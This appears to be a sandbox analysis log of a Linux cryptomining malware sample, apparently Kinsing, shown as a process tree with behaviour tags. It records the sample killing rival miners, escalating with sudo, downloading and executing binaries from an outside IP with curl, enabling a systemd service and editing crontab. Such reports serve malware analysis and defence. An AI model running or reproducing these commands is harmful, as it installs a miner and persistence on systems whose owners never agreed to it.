/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1463
-
-
/bin/grepgrep exe2⤵PID:1466
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1465
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1468
-
-
/usr/bin/idid -u2⤵PID:1469
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1470 -
/usr/sbin/sendmailsendmail -t3⤵PID:1473
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmO0f-0000Nl-S44⤵
- Reads CPU attributes
PID:1486
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1476
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmO0f-0000No-RS4⤵
- Reads CPU attributes
PID:1487
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1477
-
-
-
/usr/bin/idid -u2⤵PID:1478
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1479
-
-
/bin/unameuname -m2⤵PID:1480
-
-
/bin/lsls -la /etc/data2⤵PID:1482
-
-
/bin/grepgrep -e /dev2⤵PID:1483
-
-
/bin/grepgrep -v grep2⤵PID:1484
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1485
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1488
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1490
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1491
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1492
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1495
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
PID:1496
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
PID:1497
-
-
/bin/grepgrep -v -2⤵PID:1502
-
-
/bin/grepgrep :14142⤵PID:1499
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1501
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1500
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1503
-
-
/bin/grepgrep -v grep2⤵PID:1506
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1507
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1508
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1505
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1504
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1513
-
-
/bin/grepgrep -v grep2⤵PID:1511
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1512
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1509
-
-
/bin/grepgrep stratum2⤵PID:1510
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1517
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1518
-
-
/bin/grepgrep -v grep2⤵PID:1516
-
-
/bin/grepgrep Sofia2⤵PID:1515
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1514
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1519
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1524
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1523
-
-
/bin/grepgrep -v grep2⤵PID:1522
-
-
/bin/grepgrep tracepath2⤵PID:1521
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1520
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1529
-
-
/bin/grepgrep -v grep2⤵PID:1527
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1528
-
-
/bin/grepgrep /dot2⤵PID:1526
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1525
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1534
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1533
-
-
/bin/grepgrep -v grep2⤵PID:1532
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1531
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1530
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1539
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1538
-
-
/bin/grepgrep -v grep2⤵PID:1537
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1536
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1535
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1544
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1543
-
-
/bin/grepgrep -v grep2⤵PID:1542
-
-
/bin/grepgrep "bash -k"2⤵PID:1541
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1540
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1549
-
-
/bin/grepgrep -v grep2⤵PID:1547
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1548
-
-
/bin/grepgrep perfctl2⤵PID:1546
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1545
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
PID:1550
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
PID:1551
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1555
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1556
-
-
/bin/grepgrep -v grep2⤵PID:1554
-
-
/bin/grepgrep ./ll12⤵PID:1553
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1552
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1561
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1560
-
-
/bin/grepgrep -v grep2⤵PID:1559
-
-
/bin/grepgrep agetty2⤵PID:1558
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1557
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
PID:1562
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1566
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1565
-
-
/bin/grepgrep -v -2⤵PID:1567
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1568
-
-
/bin/grepgrep 207.38.87.62⤵PID:1564
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1571
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1572
-
-
/bin/grepgrep -v -2⤵PID:1573
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1570
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1574
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1576
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1577
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1578
-
-
/bin/grepgrep -v -2⤵PID:1579
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1580
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1583
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1584
-
-
/bin/grepgrep -v -2⤵PID:1585
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1582
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1586
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1589
-
-
/bin/grepgrep -v -2⤵PID:1591
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1590
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1588
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1592
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:1593
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
PID:1594
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1595
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1596
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
PID:1597
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads runtime system information
PID:1598
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1599
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1600
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
PID:1601
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1602
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
PID:1603
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1604
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1605
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1606
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1607
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1608
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1609
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1610
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
PID:1611
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1612
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
PID:1613
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1614
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1615
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1616
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1617
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1618
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1619
-
-
/bin/grepgrep -v grep2⤵PID:1622
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1624
-
-
/bin/grepgrep ./udp2⤵PID:1621
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1620
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1625
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1627
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1626
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1628
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1630
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1629
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1631
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1633
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1632
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1634
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1636
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1635
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1637
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1639
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1638
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1640
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1642
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1641
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1643
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1644
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1645
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1646
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1648
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1647
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1649
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1650
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1651
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1652
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1654
-
-
/bin/catcat /data/./oka.pid2⤵PID:1653
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1655
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1657
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1656
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1658
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1660
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1659
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads runtime system information
PID:1661
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1662
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1663
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1664
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1665
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1666
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1667
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1671
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1672
-
-
/bin/grepgrep -v grep2⤵PID:1670
-
-
/bin/grepgrep ./oka2⤵PID:1669
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1668
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1676
-
-
/bin/grepgrep -v grep2⤵PID:1675
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1677
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1674
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1673
-
-
/bin/grepgrep -v "\\["2⤵PID:1681
-
-
/bin/grepgrep -v "("2⤵PID:1682
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1679
-
-
/bin/grepgrep -v php-fpm2⤵PID:1683
-
-
/bin/grepgrep -v bin2⤵PID:1680
-
-
/bin/grepgrep -v proxymap2⤵PID:1684
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1678
-
-
/bin/grepgrep -v postgres2⤵PID:1685
-
-
/bin/grepgrep -v postgrey2⤵PID:1686
-
-
/bin/grepgrep -v kinsing2⤵PID:1687
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1688
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1689
-
-
/bin/grepgrep -v "\\["2⤵PID:1693
-
-
/bin/grepgrep -v bin2⤵PID:1692
-
-
/bin/grepgrep -v "("2⤵PID:1694
-
-
/bin/grepgrep -v php-fpm2⤵PID:1695
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1691
-
-
/bin/grepgrep -v proxymap2⤵PID:1696
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1690
-
-
/bin/grepgrep -v postgres2⤵PID:1697
-
-
/bin/grepgrep -v postgrey2⤵PID:1698
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1699
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1700
-
-
/bin/grepgrep -v "\\["2⤵PID:1704
-
-
/bin/grepgrep -v bin2⤵PID:1703
-
-
/bin/grepgrep -v "("2⤵PID:1705
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1702
-
-
/bin/grepgrep -v php-fpm2⤵PID:1706
-
-
/bin/grepgrep -v proxymap2⤵PID:1707
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1701
-
-
/bin/grepgrep -v postgres2⤵PID:1708
-
-
/bin/grepgrep -v postgrey2⤵PID:1709
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1710
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1711
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1714
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1715
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1716
-
-
/bin/grepgrep -v grep2⤵PID:1713
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1712
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1720
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1719
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1721
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1722
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1723
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1724
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1728
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1727
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1732
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1731
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1733
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1734
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1735
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1739
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1738
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1740
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1741
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1742
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1746
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1745
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1747
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1748
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1749
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1750
-
-
/usr/bin/idid -u2⤵PID:1752
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1753
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1766
-
-
/bin/sedsed /base64/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/bin/sedsed /_cron/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1781
-
-
/bin/sedsed /update.sh/d2⤵PID:1780
-
-
/usr/bin/crontabcrontab -l2⤵PID:1779
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/bin/sedsed /logo4/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/bin/sedsed /logo9/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/bin/sedsed /logo0/d2⤵PID:1789
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/bin/sedsed /logo/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/bin/sedsed /tor2web/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/bin/sedsed /jpg/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -l2⤵PID:1797
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1802
-
-
/bin/sedsed /png/d2⤵PID:1801
-
-
/usr/bin/crontabcrontab -l2⤵PID:1800
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1805
-
-
/bin/sedsed /tmp/d2⤵PID:1804
-
-
/usr/bin/crontabcrontab -l2⤵PID:1803
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1808
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1807
-
-
/usr/bin/crontabcrontab -l2⤵PID:1806
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1811
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1810
-
-
/usr/bin/crontabcrontab -l2⤵PID:1809
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1814
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1813
-
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:1812
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1817
-
-
/bin/sedsed /pastebin/d2⤵PID:1816
-
-
/usr/bin/crontabcrontab -l2⤵PID:1815
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1820
-
-
/bin/sedsed /onion/d2⤵PID:1819
-
-
/usr/bin/crontabcrontab -l2⤵PID:1818
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1823
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1822
-
-
/usr/bin/crontabcrontab -l2⤵PID:1821
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1826
-
-
/bin/sedsed /shuf/d2⤵PID:1825
-
-
/usr/bin/crontabcrontab -l2⤵PID:1824
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1829
-
-
/bin/sedsed /ash/d2⤵PID:1828
-
-
/usr/bin/crontabcrontab -l2⤵PID:1827
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1832
-
-
/bin/sedsed /mr.sh/d2⤵PID:1831
-
-
/usr/bin/crontabcrontab -l2⤵PID:1830
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1835
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1834
-
-
/usr/bin/crontabcrontab -l2⤵PID:1833
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1838
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1837
-
-
/usr/bin/crontabcrontab -l2⤵PID:1836
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1841
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1840
-
-
/usr/bin/crontabcrontab -l2⤵PID:1839
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1844
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1843
-
-
/usr/bin/crontabcrontab -l2⤵PID:1842
-
-
/bin/sedsed /github/d2⤵PID:1849
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1850
-
-
/usr/bin/crontabcrontab -l2⤵PID:1848
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1853
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1852
-
-
/usr/bin/crontabcrontab -l2⤵PID:1851
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1856
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1855
-
-
/usr/bin/crontabcrontab -l2⤵PID:1854
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1858
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1859
-
-
/usr/bin/crontabcrontab -l2⤵PID:1857
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1862
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1861
-
-
/usr/bin/crontabcrontab -l2⤵PID:1860
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1865
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1864
-
-
/usr/bin/crontabcrontab -l2⤵PID:1863
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1868
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1867
-
-
/usr/bin/crontabcrontab -l2⤵PID:1866
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1871
-
-
